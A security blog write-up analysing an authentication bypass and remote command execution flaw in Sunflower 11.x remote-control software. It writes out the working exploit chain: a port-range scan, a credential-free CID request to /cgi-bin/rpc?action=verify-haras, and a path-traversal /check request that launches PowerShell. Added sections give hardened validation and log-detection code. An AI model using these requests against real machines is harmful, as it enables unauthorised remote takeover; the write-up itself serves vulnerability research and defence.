0x00 Introduction
With all the excitement today, I'm taking the chance to follow the experts and do a round of analysis myself.
0x01 Analysis of the vulnerable version
It looks like every 11.x release is affected; I picked a random download site and grabbed an old version.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F8fb4e1c7-9f6c-4699-8be1-8093049f3c72%2FUntitled.png?table=block&id=82ad16d3-e503-45a1-b369-bc1594e76b18)
PEiD doesn't identify a packer, but looking at the EP section or dumping the strings makes it obvious that it's UPX.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F55ceb2c4-326e-4a96-9740-2e3a115c4cd4%2FUntitled.png?table=block&id=03902f0d-6168-4822-aef7-94cd129a304b)
UPX's automatic unpacking is enough.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F559f0b18-d3c2-4301-ac62-2081376ada56%2FUntitled.png?table=block&id=6d195e3a-c555-4701-a7c5-2936216e9ba7)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdb29a390-57b7-40fe-b180-3ede752fc7d0%2FUntitled.png?table=block&id=0446e364-2679-4962-b4fd-32c23b539e63)
The log file gives the keyword that identifies the listening port.
Requesting it directly returns the following:
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb4b2e644-02e9-4890-90f3-3c5fcfc3deae%2FUntitled.png?table=block&id=36520180-6928-4553-ae75-849d4cd2e7f5)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F377eafe5-8f01-4e8e-978d-e4c2e9b63122%2FUntitled.png?table=block&id=f3fa64e1-5d04-4286-bec7-bca2c4bb9908)
Located it in IDA. My verdict:
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F697534a0-8b94-45b0-83dc-aba8fad938f2%2FUntitled.png?table=block&id=c271db9a-1a0d-4735-b217-4c9df70794c7)
It listens on 0.0.0.0:0.
Port number 0 is a reserved port, which means it should never appear as a real port in TCP or UDP traffic. In network programming, though, and especially in Unix socket programming, it has a special meaning: binding to port 0 asks the system to pick a port dynamically.
On both Windows and Linux, binding a socket to port 0 makes the kernel assign it a free port number above 1024.
You can view the Windows allocation range with
netsh int ipv4 show dynamicport tcp
The default looks like this:
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F226db0d1-74b6-4a35-93a2-521544d10091%2FUntitled.png?table=block&id=ed781084-fa4e-435b-9f29-1583ca2fb61c)
So to exploit this you would need a wide port scan, from 49152 all the way to 65535? That feels laborious. And the configured range doesn't always start at 49152, so a scanner could start from 49152 and, if nothing turns up, fall back to scanning from 1024; that should save some time.
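An added example (my own code, not from the original post) of what binding to port 0 means in practice: the kernel hands back the port it chose, which is why the service's real port can only be discovered after the fact. The range constants are the Windows defaults from the netsh output above; on Linux the kernel draws from its own ephemeral range, so the range check is purely a comparison against the Windows default.

```python
import socket

# Default Windows dynamic (ephemeral) range, as shown by
# "netsh int ipv4 show dynamicport tcp" on an unmodified system.
WINDOWS_DEFAULT_DYNAMIC_RANGE = (49152, 65535)


def bind_to_port_zero(host="127.0.0.1"):
    """Bind a TCP listener to port 0 and return the port the kernel chose.

    The socket is closed on return; the point is to show that a listen
    address of host:0 means "assign me a free port", so the number is not
    known until getsockname() is called after bind().
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        s.listen(1)
        return s.getsockname()[1]


def in_windows_default_range(port):
    """True if port lies in the Windows default dynamic range."""
    lo, hi = WINDOWS_DEFAULT_DYNAMIC_RANGE
    return lo <= port <= hi


if __name__ == "__main__":
    port = bind_to_port_zero()
    print(f"kernel assigned port {port}; in Windows default range: "
          f"{in_windows_default_range(port)}")
```

On Linux the range the kernel picks from is in /proc/sys/net/ipv4/ip_local_port_range, so the Windows-range check may well return False there.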
First, let's look at the authentication parameter, CID.
IDA search results:
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F39494980-1aa4-4113-a0a2-f4ceb5d6e890%2FUntitled.png?table=block&id=17e1cb0e-df97-4e24-bba9-99410259c3ba)
Starting from CID, trace upward to find where a CID is returned.
Found the endpoint
/cgi-bin/rpc
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcd818067-3e93-4607-8606-80db9cdcb36a%2FUntitled.png?table=block&id=7d574bf6-9f28-41c3-afda-7f1cf1309591)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F2cedda0f-d58d-4726-81f3-a00aecbbfc25%2FUntitled.png?table=block&id=bcccbc4f-edd1-4996-a458-d98513134b53)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F5211e370-55ed-4f54-8c24-34486ea495df%2FUntitled.png?table=block&id=54df2279-4acf-42ff-8dfc-114cfb07ffa2)
The normal logic should require 4 parameters before a CID is returned; the 4 parameters are
username, password, ctrlclient, verify-haras
Normally all four should have to be present before authentication is returned, but here it returns an authenticated CID even without username and password.![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fe81dfdfb-c850-4117-9fb8-7508423bfc4b%2FUntitled.png?table=block&id=e9e55786-ffd2-492b-8270-e439992650c0)
I don't know how the new version fixes this; if they add an account/password check, couldn't that be brute-forced?
There are a few other ways to obtain a CID.
The legitimate way, using the identification code and verification code:
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F64b7c612-6cf3-4d42-a6b9-3fee008553cb%2FUntitled.png?table=block&id=0b536dd3-210a-43c4-80d9-829f938213d6)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fa4fbc412-a8ff-431a-92a1-7e64a8f08684%2FUntitled.png?table=block&id=b66931fe-6fd1-47c9-a707-1c70cb5edf41)
There's also a login endpoint that returns a CID.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff1ba8cb7-fdde-4a32-b4fe-1eb71795f0a6%2FUntitled.png?table=block&id=44cf5d9c-c3c0-478a-82ea-4bdf5bff52d5)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fea54af90-b647-41ad-bc30-c9207330cba0%2FUntitled.png?table=block&id=2758812f-900a-4396-9f20-79432f422686)
??? This endpoint validates the Windows password rather than Sunflower's own account password? That's a clear brute-force risk. I'm more and more curious how the latest version fixes it.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F30771d70-5b86-4711-b303-473bbd807e22%2FUntitled.png?table=block&id=4fed1a00-8b65-4bc7-9c33-5ce90017a638)
Now for the RCE.
I found two places that could lead to RCE.
One is the check endpoint.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F83b7e5cf-1e05-4ee1-9df1-d7d65172e26b%2FUntitled.png?table=block&id=a43a732a-57bc-4704-9a00-c6df2a54eda9)
It's restricted to commands that begin with ping or nslookup.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff904dd81-6705-44ea-9b60-766d20f5689e%2FUntitled.png?table=block&id=87dd9514-3ba2-4d0e-bfaa-0f905be8cc5f)
Seeing a restriction like this:
Isn't this an easy win?
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fee0bbe16-d980-49e1-8563-e815aefc21b9%2FUntitled.png?table=block&id=f70fa424-3289-414c-8f25-7864c5069a7c)
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc40ed73a-44f5-4011-a0c9-f88e976253fa%2FUntitled.png?table=block&id=fc75b25a-7bae-4a63-be2f-63f355b46bc8)
The garbled Chinese output is truly annoying, though.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7ee05b58-01a5-4154-a693-3389dd7298a1%2FUntitled.png?table=block&id=cb403a4a-fd8a-49b5-b984-44848039751a)
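To make the weakness of the check endpoint concrete, here is an added example (my own code, not Sunflower's; the first function is only a simplified model of the prefix check described above) contrasting a "starts with ping/nslookup" test with an allow-list on the exact tool name plus validation of the target argument, executed as argv without a shell. The traversal input is the request shown later on this page, with `command` as a placeholder for the trailing argument.

```python
import ipaddress
import re
import shlex
import subprocess
from urllib.parse import unquote_plus

ALLOWED_TOOLS = {"ping", "nslookup"}
# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
# The traversal request from the write-up, "command" standing in for the argument.
TRAVERSAL_REQUEST = ("ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows"
                     "%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+command")


def weak_prefix_check(raw_cmd):
    """Model of the original filter: only asks whether the decoded string
    *starts* with a tool name, so 'ping../../...' passes."""
    cmd = unquote_plus(raw_cmd)
    return any(cmd.startswith(tool) for tool in ALLOWED_TOOLS)


def is_valid_target(arg):
    """Accept an IP literal or a hostname; options and paths are rejected."""
    try:
        ipaddress.ip_address(arg)
        return True
    except ValueError:
        return HOSTNAME_RE.match(arg) is not None


def strict_check(raw_cmd):
    """Hardened filter: exactly two tokens, an exact tool name and a target."""
    try:
        tokens = shlex.split(unquote_plus(raw_cmd))
    except ValueError:          # unbalanced quotes and similar
        return False
    return (len(tokens) == 2
            and tokens[0] in ALLOWED_TOOLS
            and is_valid_target(tokens[1]))


def run_diagnostic(raw_cmd, timeout=10):
    """Handler for /check: validate, then execute as argv with no shell."""
    if not strict_check(raw_cmd):
        raise ValueError("rejected: not an allow-listed diagnostic command")
    tool, target = shlex.split(unquote_plus(raw_cmd))
    return subprocess.run([tool, target], capture_output=True,
                          text=True, timeout=timeout)
```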
The other is
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F3eaaafd7-9a80-47a4-be50-3450061c1800%2FUntitled.png?table=block&id=9a9c49d1-8672-4354-9062-b49716b196b3)
The restriction is that a CID is required, and the command has to be appended after
filename --mod=fastcontrol --fastcode=
At first I thought this was another easy win, but in practice it doesn't seem to be.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F7c26c87a-3484-4988-893e-3ed7002d9876%2FUntitled.png?table=block&id=450b1b1f-1548-4927-9bc1-66eb079e6ccb)
Huorong did catch this command being executed, but it actually had no effect; pasting what Huorong captured into cmd does work...... this feels like a blind spot in my knowledge.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fec9266f2-b7fb-494c-86b5-3cfe5891028c%2FUntitled.png?table=block&id=1ef10b9d-7ac5-46fb-978d-a01d085a5557)
I asked an expert and learned that this is because content can only be inserted into the program's run-time arguments; the exact mechanism and whether there's a way around it need more study.
It most likely cannot be executed: Sunflower supports very few command-line parameters, and none of them involve command execution.
![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F51174c59-dcf1-4bc8-8a3a-705c8ffff6c3%2FUntitled.png?table=block&id=66e29483-5c55-467b-aae5-739104a0226e)
0x02 Automated exploitation tool
This is actually quite easy to write.
Port scanning
Scan from 49152 to 65535 first (it usually turns up within a few hundred ports); if you're worried about missing it, scan 1024 to 49152 afterwards.
Identifying the port
Also simple: check whether the response contains
Verification failure
and that's enough.![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F1b8ad5be-81ca-4498-b9d8-603e3bb8e12f%2FUntitled.png?table=block&id=d5c84f96-af7f-4070-8069-2a8dd561d258)
Command execution
Request
/cgi-bin/rpc?action=verify-haras
to obtain a CID.![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F15e43640-34dd-450f-bd74-f4026c30ccfa%2FUntitled.png?table=block&id=4b4fa578-dda8-4fc1-b7cb-4fa3bdbade85)
Send the CID in the Cookie and request
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+<command>
to execute the command.![notion image](https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F6b1b6901-f8b9-40a1-bb17-94c21137760a%2FUntitled.png?table=block&id=056c5cc2-90f5-43c5-89d2-675e320228e4)
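For defenders, both requests in this chain are easy to spot in access logs. The following added example (my own code, not from the original post) runs detection logic over constructed sample lines in a generic access-log shape: it flags a verify-haras CID request that carries no username/password, and a /check cmd whose first token is not exactly ping or nslookup or that contains a traversal sequence. The log format and client addresses are assumptions, since the write-up does not show the service's own logs.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in a generic access-log shape; the real service's
# log format is not shown in the write-up, so adapt LINE_RE to your source.
SAMPLE_LOG = """\
10.0.0.5 - [01/Mar/2022:10:00:01] "GET /cgi-bin/rpc?action=verify-haras HTTP/1.1" 200
10.0.0.5 - [01/Mar/2022:10:00:02] "GET /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+command HTTP/1.1" 200
10.0.0.9 - [01/Mar/2022:10:05:00] "GET /check?cmd=ping+127.0.0.1 HTTP/1.1" 200
10.0.0.9 - [01/Mar/2022:10:06:00] "GET /cgi-bin/rpc?action=verify-haras&username=u&password=p&ctrlclient=1 HTTP/1.1" 200
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \[(?P<time>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d+)')
ALLOWED_TOOLS = {"ping", "nslookup"}


def classify_request(url):
    """Return the reasons one request URL matches the patterns in the write-up."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)  # values come back decoded
    reasons = []
    if parts.path == "/cgi-bin/rpc" and "verify-haras" in qs.get("action", []):
        if not {"username", "password"} <= set(qs):
            reasons.append("verify-haras CID request without username/password")
    if parts.path == "/check":
        for cmd in qs.get("cmd", []):
            tokens = cmd.split()
            first = tokens[0] if tokens else ""
            if first not in ALLOWED_TOOLS:
                reasons.append(f"check cmd first token is not an exact tool name: {first!r}")
            if "../" in cmd or "..\\" in cmd:
                reasons.append("path traversal sequence inside check cmd")
    return reasons


def scan_log(text):
    """Return (client, path, reason) findings for every parsable line."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for reason in classify_request(m["url"]):
            findings.append((m["ip"], urlsplit(m["url"]).path, reason))
    return findings


if __name__ == "__main__":
    for client, path, reason in scan_log(SAMPLE_LOG):
        print(f"{client} {path}: {reason}")
```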
0x03 Analysis of the latest version
The latest version simply removed the port, so that's the end of that.
The port was presumably used by the mobile Sunflower app to control devices on the LAN; that feature in the mobile app is now dead.
But I think this is a temporary fix; when the feature comes back online, we'll see whether there's anything exploitable.
0x04 AV evasion
While I was researching this, Sunflower suddenly stopped working. Maybe the vendor killed the old version?
- Author: fatekey
- Link: https://blog.fatekey.icu/article/xrkrce
- Notice: This article is licensed under CC BY-NC-SA 4.0; please credit the source when reposting.